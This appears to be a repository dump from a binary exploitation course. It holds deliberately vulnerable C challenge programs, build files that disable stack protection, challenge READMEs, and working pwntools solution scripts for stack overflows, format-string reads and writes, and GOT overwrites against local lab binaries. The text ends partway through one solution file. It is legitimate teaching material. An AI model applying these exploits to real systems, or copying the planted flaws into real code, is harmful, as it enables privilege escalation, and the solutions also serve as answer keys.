| p.sendline("A"*42 + p32(JUMP_ADDR)) 10 | 11 | print p.recvrepeat(1) 12 | -------------------------------------------------------------------------------- /src/week3/challenges/stack-ovfl-use-envp-32/exploit-32.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | 3 | from pwn import * 4 | 5 | p = process("./stack-ovfl-32") 6 | 7 | JUMP_ADDR = p.elf.symbols['execute_me'] 8 | 9 | p.sendline("A"*42 + p32(JUMP_ADDR)) 10 | 11 | print p.recvrepeat(1) 12 | -------------------------------------------------------------------------------- /src/week3/challenges/stack-ovfl-where-32-2/exploit-32.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | 3 | from pwn import * 4 | 5 | p = process("./stack-ovfl-32") 6 | 7 | JUMP_ADDR = p.elf.symbols['execute_me'] 8 | 9 | p.sendline("A"*42 + p32(JUMP_ADDR)) 10 | 11 | print p.recvrepeat(1) 12 | -------------------------------------------------------------------------------- /src/week3/challenges/stack-ovfl-where-32/exploit-32.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | 3 | from pwn import * 4 | 5 | p = process("./stack-ovfl-32") 6 | 7 | JUMP_ADDR = p.elf.symbols['execute_me'] 8 | 9 | p.sendline("A"*42 + p32(JUMP_ADDR)) 10 | 11 | print p.recvrepeat(1) 12 | -------------------------------------------------------------------------------- /src/week7/challenges/get-flag-without-write-nor-exec/Makefile: -------------------------------------------------------------------------------- 1 | all: get-flag-without-write-nor-exec 2 | 3 | get-flag-without-write-nor-exec: get-flag-without-write-nor-exec.c 4 | clang -o $@ $< -fno-stack-protector -lseccomp 5 | 6 | clean: 7 | rm get-flag-without-write-nor-exec 8 | -------------------------------------------------------------------------------- /src/week3/challenges/stack-ovfl-no-envp-no-argv-32/Makefile: -------------------------------------------------------------------------------- 1 | all: stack-ovfl-no-envp-no-argv-32 2 | 3 | stack-ovfl-no-envp-no-argv-32: stack-ovfl-no-envp-no-argv.c 4 | cc -o $@ $< -m32 -fno-stack-protector -z execstack -DBUFSIZE=4 5 | 6 | clean: 7 | rm -rf stack-ovfl-no-envp-no-argv-32 8 | -------------------------------------------------------------------------------- /src/week2/challenges/bof-level2/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | 3 | from pwn import * 4 | 5 | p = process('./bof-level2') 6 | e = ELF('./bof-level2') 7 | 8 | get_a_shell = e.symbols['get_a_shell'] 9 | 10 | buf = "1"*20 11 | 12 | p.sendline(buf) 13 | 14 | p.interactive() 15 | -------------------------------------------------------------------------------- /src/week2/challenges/bof-level3/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | 3 | from pwn import * 4 | 5 | p = process('./bof-level3') 6 | e = ELF('./bof-level3') 7 | 8 | get_a_shell = e.symbols['get_a_shell'] 9 | 10 | buf = "1"*32 11 | 12 | p.sendline(buf) 13 | 14 | p.interactive() 15 | -------------------------------------------------------------------------------- /src/week2/challenges/bof-level4/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | 3 | from pwn import * 4 | 5 | p = process('./bof-level4') 6 | e = ELF('./bof-level4') 7 | 8 | get_a_shell = e.symbols['get_a_shell'] 9 | 10 | buf = "1"*20 11 | 12 | p.sendline(buf) 13 | 14 | p.interactive() 15 | -------------------------------------------------------------------------------- /src/week3/challenges/stack-ovfl-no-envp-no-argv-32/exploit-32.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | 3 | from pwn import * 4 | 5 | p = process("./stack-ovfl-32") 6 | 7 | JUMP_ADDR = p.elf.symbols['execute_me'] 8 | 9 | p.sendline("A"*42 + p32(JUMP_ADDR)) 10 | 11 | print p.recvrepeat(1) 12 | -------------------------------------------------------------------------------- /src/week5/challenges/rop-5-32/README: -------------------------------------------------------------------------------- 1 | Steps: 2 | 3 | 1. Leak GOT of any libc function -> get the function address in libc 4 | 2. Calculate the address of execve 5 | 3. execve("A", 0, 0); 6 | The program A must inherit the privilege 7 | (e.g., call setreuid(geteuid(), geteuid()); system("sh")). 8 | -------------------------------------------------------------------------------- /src/week5/challenges/rop-5-64/README: -------------------------------------------------------------------------------- 1 | Steps: 2 | 3 | 1. Leak GOT of any libc function -> get the function address in libc 4 | 2. Calculate the address of execve 5 | 3. execve("A", 0, 0); 6 | The program A must inherit the privilege 7 | (e.g., call setreuid(geteuid(), geteuid()); system("sh")). 8 | -------------------------------------------------------------------------------- /src/week1/challenges/level4/README: -------------------------------------------------------------------------------- 1 | This challenge is a mixture of level0, level1, level2, and level3. 2 | 3 | Can you pass two checks, password() and calculate() to get a 4 | privileged shell from the challenge? 5 | 6 | Hint: Please understand the usage of scanf(), strtoul(), snprintf(), etc.. 7 | -------------------------------------------------------------------------------- /src/week3/challenges/stack-ovfl-where-32-2/README: -------------------------------------------------------------------------------- 1 | The program wipes out all the stack content located in the upper location 2 | than the arguments of the main() function 3 | (e.g., wipes out from the address of argc to the top). 4 | 5 | Can you place your shellcode on the stack and run your shellcode? 6 | -------------------------------------------------------------------------------- /solutions/week6/fs-read-2-64.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from pwn import * 4 | 5 | p = process('fs-read-2-64') 6 | 7 | print(p.recv()) 8 | 9 | p.sendline('%78$p') 10 | 11 | data = p.recv() 12 | 13 | line = data.split(' ')[1].split('\n')[0][:-8] 14 | p.sendline(line) 15 | 16 | p.interactive() 17 | -------------------------------------------------------------------------------- /src/week1/challenges/level2/README: -------------------------------------------------------------------------------- 1 | The program reads three integers from your input and does some calculations. 2 | 3 | Can you discover at which condition the program grants you a privileged shell? 4 | 5 | Hint: use gdb to figure out the calculation and the value that is compared to 6 | the calculation result. 7 | -------------------------------------------------------------------------------- /src/week2/challenges/bof-level7/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | 3 | from pwn import * 4 | 5 | env = { 6 | 'DUMMY': 'a'*128 7 | } 8 | p = process('./bof-level7', env = env) 9 | 10 | e = ELF('./bof-level7') 11 | 12 | get_a_shell = e.symbols['get_a_shell'] 13 | 14 | 15 | p.interactive() 16 | -------------------------------------------------------------------------------- /src/week2/challenges/bof-level8/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | 3 | from pwn import * 4 | 5 | env = { 6 | 'DUMMY': 'a'*128 7 | } 8 | p = process('./bof-level8', env = env) 9 | 10 | e = ELF('./bof-level8') 11 | 12 | get_a_shell = e.symbols['get_a_shell'] 13 | 14 | 15 | p.interactive() 16 | -------------------------------------------------------------------------------- /src/week6/challenges/fs-code-exec-32/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from pwn import * 4 | env = { 5 | 'PATH' : '.:/bin:/usr/bin' 6 | } 7 | p = process('fs-code-exec-32', env=env) 8 | 9 | puts_got = p.elf.got['puts'] 10 | printf_got = p.elf.got['printf'] 11 | 12 | p.interactive() 13 | -------------------------------------------------------------------------------- /src/week6/challenges/fs-code-exec-64/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from pwn import * 4 | env = { 5 | 'PATH' : '.:/bin:/usr/bin' 6 | } 7 | 8 | p = process('fs-code-exec-64', env=env) 9 | puts_got = p.elf.got['puts'] 10 | printf_got = p.elf.got['printf'] 11 | 12 | p.interactive() 13 | -------------------------------------------------------------------------------- /src/week7/challenges/deprivileged/README: -------------------------------------------------------------------------------- 1 | setregid(getgid(), getgid()) will remove the 'escalated' 2 | effective gid, which is required for reading the flag by 3 | running 'cat flag', from the program. 4 | 5 | I put that in the program, but can you still read the flag (yes!)? 6 | Wish you with a $ touch 'good luck' 7 | -------------------------------------------------------------------------------- /solutions/week2/bof-level2.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from pwn import * 4 | 5 | p = process('./bof-level2') 6 | e = ELF('./bof-level2') 7 | 8 | get_a_shell = e.symbols['get_a_shell'] 9 | 10 | buf = "1"*20 + "ABCDEFGH" + "BBBBCCCC" + p32(get_a_shell) 11 | 12 | p.sendline(buf) 13 | 14 | p.interactive() 15 | -------------------------------------------------------------------------------- /src/week1/challenges/level6/README: -------------------------------------------------------------------------------- 1 | The program asks you seven integers as the key to the privileged shell. 2 | Can you guess what are they and pwn the challenge? 3 | 4 | Hint: You may reverse engineer the algorithm, but if you are lazy enough, 5 | you may pass the algorithm to see only the result of the algorithm... 6 | -------------------------------------------------------------------------------- /solutions/week2/bof-level3.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from pwn import * 4 | 5 | p = process('./bof-level3') 6 | e = ELF('./bof-level3') 7 | 8 | get_a_shell = e.symbols['get_a_shell'] 9 | 10 | buf = "1"*32 + "ABCDEFGHabcdefgh" + "BBBBCCCC" + p64(get_a_shell) 11 | 12 | p.sendline(buf) 13 | 14 | p.interactive() 15 | -------------------------------------------------------------------------------- /src/week5/challenges/rop-1-32/exploit-rop-1.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | 3 | import os 4 | 5 | # import pwntools 6 | from pwn import * 7 | 8 | env = {} 9 | 10 | # prepare the program name and args 11 | argv = [ 12 | "./rop-1-32", 13 | ] 14 | 15 | p = process(argv, env=env) 16 | 17 | print p.interactive() 18 | -------------------------------------------------------------------------------- /solutions/week6/fs-read-1-32.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from pwn import * 4 | 5 | p = process("./fs-read-1-32") 6 | 7 | print(p.recv()) 8 | 9 | p.sendline("%6$p") 10 | 11 | data = p.recv() 12 | print(data) 13 | 14 | random = data.split(' ')[1].split('\n')[0] 15 | 16 | p.sendline(random) 17 | 18 | p.interactive() 19 | -------------------------------------------------------------------------------- /solutions/week6/fs-read-1-64.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from pwn import * 4 | 5 | p = process('./fs-read-1-64') 6 | 7 | print(p.recv()) 8 | p.sendline("%7$p") 9 | 10 | data = p.recv() 11 | 12 | print(repr(data)) 13 | 14 | hex_val = data.split(' ')[1].split('\n')[0] 15 | p.sendline(hex_val[:-8]) 16 | p.interactive() 17 | -------------------------------------------------------------------------------- /solutions/week6/fs-read-2-32.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from pwn import * 4 | 5 | p = process('./fs-read-2-32') 6 | 7 | print(p.recv()) 8 | 9 | p.sendline("%150$p") 10 | 11 | data = p.recv() 12 | 13 | print(repr(data)) 14 | value = data.split(' ')[1].split('\n')[0] 15 | p.sendline(value) 16 | 17 | p.interactive() 18 | -------------------------------------------------------------------------------- /src/week1/challenges/level8/test.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | def fib(a, b, times): 4 | for i in xrange(times): 5 | t = b 6 | b = a+b 7 | a = t 8 | return b 9 | 10 | 11 | def main(): 12 | v = int(raw_input()) 13 | print(fib(3,4,v)) 14 | 15 | if __name__ == '__main__': 16 | main() 17 | -------------------------------------------------------------------------------- /src/week1/challenges/level9/test.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | def fib(a, b, times): 4 | for i in xrange(times): 5 | t = b 6 | b = a+b 7 | a = t 8 | return b 9 | 10 | 11 | def main(): 12 | v = int(raw_input()) 13 | print(fib(3,4,v)) 14 | 15 | if __name__ == '__main__': 16 | main() 17 | -------------------------------------------------------------------------------- /solutions/week2/bof-level4.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from pwn import * 4 | 5 | p = process('./bof-level4') 6 | e = ELF('./bof-level4') 7 | 8 | get_a_shell = e.symbols['get_a_shell'] 9 | 10 | buf = "1"*20 + "ABCDEFGH" + "BBBBCCCC" + p32(0x804876b) + "A"*12 + p32(get_a_shell) 11 | 12 | p.sendline(buf) 13 | 14 | p.interactive() 15 | -------------------------------------------------------------------------------- /src/week1/challenges/level1/README: -------------------------------------------------------------------------------- 1 | The program asks you a password, but now it transforms your input to 2 | an integer value via scanf() and then applies integer comparison. 3 | 4 | Can you discover the password and get the privileged shell from the challenge? 5 | 6 | Hint: use gdb to check the comparison instruction (e.g., cmpl, test, etc.). 7 | -------------------------------------------------------------------------------- /src/week3/challenges/nonzero-shellcode-32/README: -------------------------------------------------------------------------------- 1 | Write a 32-bit shellcode that runs: 2 | setregid(getegid(), getegid()) 3 | execve("/bin/sh", 0, 0); 4 | and put the shellcode binary (shellcode.bin) into this directory. 5 | 6 | Your shellcode must not have zero byte. 7 | Check that with make objdump and make print. No 00 or \x00! 8 | 9 | 10 | -------------------------------------------------------------------------------- /src/week3/challenges/nonzero-shellcode-64/README: -------------------------------------------------------------------------------- 1 | Write a 32-bit shellcode that runs: 2 | setregid(getegid(), getegid()) 3 | execve("/bin/sh", 0, 0); 4 | and put the shellcode binary (shellcode.bin) into this directory. 5 | 6 | Your shellcode must not have zero byte. 7 | Check that with make objdump and make print. No 00 or \x00! 8 | 9 | 10 | -------------------------------------------------------------------------------- /src/week5/challenges/rop-1-64/exploit-rop-1.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | 3 | import os 4 | 5 | # import pwntools 6 | from pwn import * 7 | 8 | env = {} 9 | 10 | # prepare the program name and args 11 | argv = [ 12 | "./rop-1-64", 13 | ] 14 | 15 | p = process(argv, env=env) 16 | 17 | # get an interactive pipe 18 | print p.interactive() 19 | -------------------------------------------------------------------------------- /src/week5/challenges/rop-2-32/exploit-rop-2-32.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | 3 | import os 4 | 5 | # import pwntools 6 | from pwn import * 7 | 8 | env = {} 9 | 10 | # prepare the program name and args 11 | argv = [ 12 | "./rop-2-32", 13 | ] 14 | 15 | p = process(argv, env=env) 16 | 17 | # get an interactive pipe 18 | print p.interactive() 19 | -------------------------------------------------------------------------------- /src/week5/challenges/rop-2-64/exploit-rop-2-64.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | 3 | import os 4 | 5 | # import pwntools 6 | from pwn import * 7 | 8 | env = {} 9 | 10 | # prepare the program name and args 11 | argv = [ 12 | "./rop-4-64", 13 | ] 14 | 15 | p = process(argv, env=env) 16 | 17 | # get an interactive pipe 18 | print p.interactive() 19 | -------------------------------------------------------------------------------- /src/week3/challenges/stack-ovfl-sc-32/Makefile: -------------------------------------------------------------------------------- 1 | all: stack-ovfl-sc-32 2 | 3 | CC=clang 4 | 5 | stack-ovfl-sc-32: stack-ovfl-sc.c 6 | $(CC) -o $@ $< -m32 -fno-stack-protector -z execstack -DBUFSIZE=128 7 | 8 | stack-ovfl-sc-64: stack-ovfl-sc.c 9 | $(CC) -o $@ $< -m64 -fno-stack-protector -z execstack -DBUFSIZE=128 10 | 11 | clean: 12 | rm -rf stack-ovfl-sc-32 stack-ovfl-sc-64 13 | -------------------------------------------------------------------------------- /src/week7/challenges/where-to-jump/where-to-jump.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | void target() { 4 | int i; 5 | printf("JUMP GAME\n"); 6 | printf("Give me an address to jump. Then I will jump for you\n"); 7 | scanf("%x", &i); 8 | printf("Your choice is: %p\n", (void*)i); 9 | // jump! 10 | ((void(*)(void))i)(); 11 | } 12 | 13 | int main() { 14 | target(); 15 | } 16 | -------------------------------------------------------------------------------- /src/week5/challenges/rop-7-64/rop-7-64.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | #include 5 | 6 | // Please check the assembly for the correct buffer size 7 | #ifndef BUFSIZE 8 | #define BUFSIZE 128 9 | #endif 10 | 11 | 12 | int main(int argc, char** argv, char** envp) { 13 | uint64_t *ptr; 14 | read(0, &ptr, 8); 15 | ((int(*)(void))ptr)(); 16 | return 0; 17 | } 18 | -------------------------------------------------------------------------------- /solutions/week6/aw-1.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from pwn import * 4 | 5 | p = process("./aw-1") 6 | 7 | printf_got = p.elf.got['printf'] 8 | target_address = p.elf.symbols['please_execute_me'] 9 | 10 | print(p.recv()) 11 | 12 | p.sendline("6") 13 | 14 | print(p.recv()) 15 | 16 | p.sendline(hex(printf_got)) 17 | 18 | print(p.recv()) 19 | 20 | p.send(p64(target_address)[0:6]) 21 | 22 | p.interactive() 23 | -------------------------------------------------------------------------------- /src/week7/challenges/tocttou/README: -------------------------------------------------------------------------------- 1 | This program checks if the filename that you typed is under to your group id. 2 | If it is, it will print out its content, however, it will just exit if 3 | the file is not in your group (not for your effective gid). 4 | 5 | Can you exploit 'time-of-check-to-time-of-use' (TOCTTOU) bug in the program 6 | to read the flag? 7 | 8 | https://en.wikipedia.org/wiki/Time-of-check_to_time-of-use 9 | -------------------------------------------------------------------------------- /src/week2/challenges/bof-level0/README: -------------------------------------------------------------------------------- 1 | Stack is configured as follows: 2 | 3 | [ebp+0x4] return address 4 | [ebp] saved ebp 5 | [ebp-0x4] 6 | [ebp-0x8] a = 0x41414141 7 | [ebp-0xc] b = 0x42424242 8 | [ebp-0x10] 9 | [ebp-0x14] 10 | [ebp-0x18] 11 | [ebp-0x1c] 12 | [ebp-0x20] buffer 13 | 14 | Can you overwrite both a and b to make: 15 | 16 | a = 0x48474645 and b = 0x44434241? 17 | -------------------------------------------------------------------------------- /src/week2/challenges/bof-level1/README: -------------------------------------------------------------------------------- 1 | Stack is configured as follows: 2 | 3 | [rbp+0x8] return address 4 | [rbp] saved rbp 5 | [rbp-0x8] a = 0x4141414141414141 6 | [rbp-0x10] b = 0x4242424242424242 7 | [rbp-0x18] 8 | [rbp-0x20] 9 | [rbp-0x28] 10 | [rbp-0x30] buffer 11 | 12 | Can you overwrite both a and b to make: 13 | 14 | a = 0x6867666564636261 and b = 0x4847464544434241? 15 | 16 | -------------------------------------------------------------------------------- /src/week1/challenges/README: -------------------------------------------------------------------------------- 1 | level0: use strcmp (tut) 2 | level1: use integer on the stack (tut) 3 | level2: use integer at the globals (tut) 4 | level3: use a loop (tut) 5 | level4: use strcmp, atoi, variables on the stack and globals 6 | level5: use loop, atoi, sum, sprintf, string compare, value compare 7 | level6: a bubble sort algorithm 8 | level7: use memfrob, atoi, calculate, etc. 9 | level8: fibonacci with a tweak 10 | level9: prime number 11 | -------------------------------------------------------------------------------- /src/week2/challenges/README: -------------------------------------------------------------------------------- 1 | level0: use strcmp (tut) 2 | level1: use integer on the stack (tut) 3 | level2: use integer at the globals (tut) 4 | level3: use a loop (tut) 5 | level4: use strcmp, atoi, variables on the stack and globals 6 | level5: use loop, atoi, sum, sprintf, string compare, value compare 7 | level6: a bubble sort algorithm 8 | level7: use memfrob, atoi, calculate, etc. 9 | level8: fibonacci with a tweak 10 | level9: prime number 11 | -------------------------------------------------------------------------------- /src/week7/challenges/guess-passwd/README: -------------------------------------------------------------------------------- 1 | Can you guess my root password? 2 | The PASSWD string in the source code is scrambled, but the length of 3 | my password is the same as the length of the string PASSWD. 4 | 5 | Password charset: abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 6 | 7 | Hint: measure the time 8 | import time 9 | 10 | t1 = time.time() 11 | data = p.recv() 12 | t2 = time.time() 13 | time_diff = t2 - t1 14 | -------------------------------------------------------------------------------- /src/week3/challenges/README: -------------------------------------------------------------------------------- 1 | Scored - 2 | 3 | SHELLCODE - 32bit getegid(); setreguid(); execve() shell 4 | SHELLCODE - 64bit getegid(); setreguid(); execve() shell 5 | SHELLCODE - ASCII 32 6 | SHELLCODE - ASCII 64 7 | 8 | BOF - simple - using ENVP 9 | BOF - ARGV - delete ENVP 10 | BOF - delete ARGV ENVP 11 | BOF - ret-check (no return to stack check) 12 | 13 | 14 | Not-scored 15 | 16 | SHELLCODE - alphanumeric 32 17 | SHELLCODE - alphanumeric 64 18 | -------------------------------------------------------------------------------- /solutions/week6/fs-arbt-write-32.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from pwn import * 4 | 5 | p = process("./fs-arbt-write-32") 6 | 7 | gr_addr = p.elf.symbols['global_random'] 8 | 9 | print(hex(gr_addr)) 10 | 11 | print(p.recv()) 12 | 13 | # 0xfaceb00c 14 | first = 0xb00c - 8 15 | second = 0xface - 0xb00c 16 | 17 | p.sendline(p32(gr_addr) + p32(gr_addr+2) + '%' + ("%dx" % first) + "%7$n" + "%" + ("%dx" % second) +"%8$n") 18 | 19 | print(p.recv()) 20 | 21 | p.interactive() 22 | -------------------------------------------------------------------------------- /solutions/week6/fs-arbt-read-32.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from pwn import * 4 | 5 | p = process('fs-arbt-read-32') 6 | 7 | print(p.recv()) 8 | 9 | random_value_addr = p.elf.symbols['random_value'] 10 | 11 | p.sendline(p32(random_value_addr)+ "\n%7$s") 12 | 13 | data = p.recv() 14 | print(repr(data)) 15 | 16 | addr = data.split('\n')[1][:4] 17 | 18 | print(addr) 19 | 20 | addr = u32(addr) 21 | 22 | print(hex(addr)) 23 | 24 | p.sendline(hex(addr)) 25 | p.interactive() 26 | -------------------------------------------------------------------------------- /solutions/week6/fs-arbt-read-64.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from pwn import * 4 | 5 | p = process('./fs-arbt-read-64') 6 | 7 | random_value_addr = p.elf.symbols['random_value'] 8 | 9 | print(p.recv()) 10 | 11 | buf = "%9$sBBBB" + p64(random_value_addr) 12 | 13 | p.sendline(buf) 14 | 15 | data = p.recv() 16 | 17 | print(repr(data)) 18 | 19 | v = data.split(' ')[1].split('BBBB')[0] 20 | print(repr(v)) 21 | 22 | value = u32(v) 23 | 24 | p.sendline(hex(value)) 25 | 26 | p.interactive() 27 | -------------------------------------------------------------------------------- /src/week2/challenges/bof-level3/README: -------------------------------------------------------------------------------- 1 | Stack is configured as follows: 2 | 3 | [rbp+0x8] return address 4 | [rbp] saved rbp 5 | [rbp-0x8] a = 0x4141414141414141 6 | [rbp-0x10] b = 0x4242424242424242 7 | [rbp-0x18] 8 | [rbp-0x20] 9 | [rbp-0x28] 10 | [rbp-0x30] buffer 11 | 12 | Can you overwrite both a and b to make: 13 | 14 | a = 0x6867666564636261 and b = 0x4847464544434241 15 | 16 | and overwrite the return address to run get_a_shell()? 17 | 18 | -------------------------------------------------------------------------------- /src/week2/challenges/bof-level2/README: -------------------------------------------------------------------------------- 1 | Stack is configured as follows: 2 | 3 | [ebp+0x4] return address 4 | [ebp] saved ebp 5 | [ebp-0x4] 6 | [ebp-0x8] a = 0x41414141 7 | [ebp-0xc] b = 0x42424242 8 | [ebp-0x10] 9 | [ebp-0x14] 10 | [ebp-0x18] 11 | [ebp-0x1c] 12 | [ebp-0x20] buffer 13 | 14 | Can you overwrite both a and b to make: 15 | 16 | a = 0x48474645 and b = 0x44434241 17 | 18 | and also overwrite the return address to execute get_a_shell()? 19 | 20 | -------------------------------------------------------------------------------- /setup-workdir.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import glob 4 | import os 5 | 6 | def main(): 7 | g = glob.glob('/home/labs/week*/challenges/*') 8 | for _dir in g: 9 | if os.path.isdir(_dir): 10 | symlink_path = f"{_dir}/workdir" 11 | os.symlink("/home/labs/workdir", symlink_path) 12 | 13 | g = glob.glob('/home/labs/week*/**/Makefile', recursive=True) 14 | for _makefile in g: 15 | os.unlink(_makefile) 16 | 17 | if __name__ == '__main__': 18 | main() 19 | -------------------------------------------------------------------------------- /solutions/week6/fs-arbt-write-64: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from pwn import * 4 | 5 | p = process('fs-arbt-write-64') 6 | 7 | gr_addr = p.elf.symbols['global_random'] 8 | 9 | print(hex(gr_addr)) 10 | 11 | print(p.recv()) 12 | 13 | first = 0xb00c 14 | second = 0xface - 0xb00c 15 | buf = "%" + ("%05dx" % first) + "%9$n" + "%" + ("%05dx" % second) + "%10$nd" + p64(gr_addr) + p64(gr_addr+2) 16 | print(buf) 17 | 18 | p.sendline(buf) 19 | 20 | data = p.recv() 21 | 22 | print(repr(data)) 23 | 24 | p.interactive() 25 | -------------------------------------------------------------------------------- /solutions/week2/bof-level5.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from pwn import * 4 | 5 | p = process('./bof-level5') 6 | e = ELF('./bof-level5') 7 | 8 | get_a_shell = e.symbols['get_a_shell'] 9 | 10 | 11 | buf = p32(get_a_shell) * (128/4) + p32(0) 12 | 13 | p.sendline(buf) 14 | p.wait() 15 | p.close() 16 | 17 | c = Core('./core') 18 | 19 | addr = c.stack.find(buf) 20 | 21 | 22 | exploit_buf = p32(get_a_shell) * (128/4) + p32(addr) 23 | 24 | p = process('./bof-level5') 25 | p.sendline(exploit_buf) 26 | p.interactive() 27 | -------------------------------------------------------------------------------- /solutions/week2/bof-level9.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from pwn import * 4 | 5 | p = process('./bof-level9') 6 | e = ELF('./bof-level9') 7 | 8 | get_a_shell = e.symbols['get_a_shell'] 9 | 10 | 11 | buf = p32(get_a_shell) * (128/4) + p32(0) 12 | 13 | p.sendline(buf) 14 | p.wait() 15 | p.close() 16 | 17 | c = Core('./core') 18 | 19 | addr = c.stack.find(buf) 20 | 21 | 22 | exploit_buf = p32(get_a_shell) * (127/4) + p32(addr+4) 23 | 24 | p = process('./bof-level9') 25 | p.sendline(exploit_buf) 26 | p.interactive() 27 | -------------------------------------------------------------------------------- /src/week2/challenges/bof-level5/README: -------------------------------------------------------------------------------- 1 | The stack is configured as follows (in receive_input()): 2 | 3 | [ebp+0x4] return address Can't overwrite 4 | [ebp] saved ebp 5 | [ebp-0x4] 6 | [ebp-0x8] 7 | ... 8 | ... 9 | ... 10 | [ebp-0x80] buffer 11 | 12 | 13 | You can overwrite the 'saved ebp' but you can't overwrite the return address 14 | because the buffer size is 128 byte, and your input is allowed upto 132 bytes 15 | (to fully overwrite the return address, you need 136 bytes of your input). 16 | 17 | Can you exploit this program to run get_a_shell()? 18 | -------------------------------------------------------------------------------- /src/week2/challenges/bof-level6/README: -------------------------------------------------------------------------------- 1 | The stack is configured as follows (in receive_input()): 2 | 3 | [rbp+0x8] return address Can't overwrite 4 | [rbp] saved rbp 5 | [rbp-0x8] 6 | [rbp-0x10] 7 | ... 8 | ... 9 | ... 10 | [rbp-0x80] buffer 11 | 12 | 13 | You can overwrite the 'saved rbp' but you can't overwrite the return address 14 | because the buffer size is 128 byte, and your input is allowed upto 136 bytes 15 | (to fully overwrite the return address, you need 144 bytes of your input). 16 | 17 | Can you exploit this program to run get_a_shell()? 18 | -------------------------------------------------------------------------------- /src/week2/challenges/bof-level8/README: -------------------------------------------------------------------------------- 1 | 2 | [rbp+0x8] return address Can't overwrite 3 | [rbp] saved rbp Can overwrite the last 1 byte... 4 | [rbp-0x8] 5 | [rbp-0x10] 6 | ... 7 | ... 8 | ... 9 | [rbp-0x80] buffer 10 | 11 | 12 | The program gets your input upto 129 bytes because the developer made a mistake, 13 | putting '=' in the for loop. Because of this, you can overwrite 14 | the last 1 byte of 'saved ebp' but you can't overwrite other bytes nor 15 | the return address. 16 | 17 | Can you exploit this program to run get_a_shell()? 18 | -------------------------------------------------------------------------------- /src/week2/challenges/bof-level9/bof-level9.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | #include 6 | 7 | void get_a_shell() { 8 | printf("Spawning a privileged shell\n"); 9 | setregid(getegid(), getegid()); 10 | execl("/bin/bash", "bash", NULL); 11 | } 12 | 13 | int main() { 14 | char buf[120]; 15 | printf("Now we have a buffer overflow vulnerability,\nh"); 16 | printf("but the vulnerability cannot reach to the return address...\n"); 17 | printf("Can you exploit this program?\n"); 18 | fgets(buf, 192, stdin); 19 | } 20 | -------------------------------------------------------------------------------- /src/week2/challenges/bof-level4/README: -------------------------------------------------------------------------------- 1 | In receive_input(), 2 | the program first store the return address to 3 | a global varlable 'my_return_address'. 4 | Later, when the function returns, 5 | the program gets the current return address (stores to new_return_address) 6 | and compares values in my_return_address to new_return_address. 7 | In case if the values in two variables are different, 8 | the program regard it as a case of attack 9 | (because the return address has been changed!) 10 | and run exit(-1). 11 | 12 | Under this condition, 13 | can you exploit the program and run get_a_shell()? 14 | -------------------------------------------------------------------------------- /src/week1/challenges/level1/level1.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | #include 6 | 7 | void get_a_shell() { 8 | printf("Spawning a privileged shell\n"); 9 | setregid(getegid(), getegid()); 10 | execl("/bin/bash", "bash", NULL); 11 | } 12 | 13 | int main() { 14 | 15 | int value = 0; 16 | printf("What's the password?\n"); 17 | scanf("%d", &value); 18 | if(value == 1457664) { 19 | printf("Correct!\n"); 20 | get_a_shell(); 21 | } 22 | else { 23 | printf("Wrong password!!\n"); 24 | } 25 | 26 | } 27 | -------------------------------------------------------------------------------- /src/week1/challenges/level0/level0.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | #include 6 | 7 | void get_a_shell() { 8 | printf("Spawning a privileged shell\n"); 9 | setregid(getegid(), getegid()); 10 | execl("/bin/bash", "bash", NULL); 11 | } 12 | 13 | 14 | int main() { 15 | char buf[512]; 16 | printf("What's the password?\n"); 17 | scanf("%s", buf); 18 | if(strcmp(buf, "PaSSw0Rd") == 0) { 19 | printf("Correct!\n"); 20 | get_a_shell(); 21 | } 22 | else { 23 | printf("Wrong password!!\n"); 24 | } 25 | } 26 | -------------------------------------------------------------------------------- /solutions/week2/bof-level6.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from pwn import * 4 | 5 | p = process('./bof-level6') 6 | e = 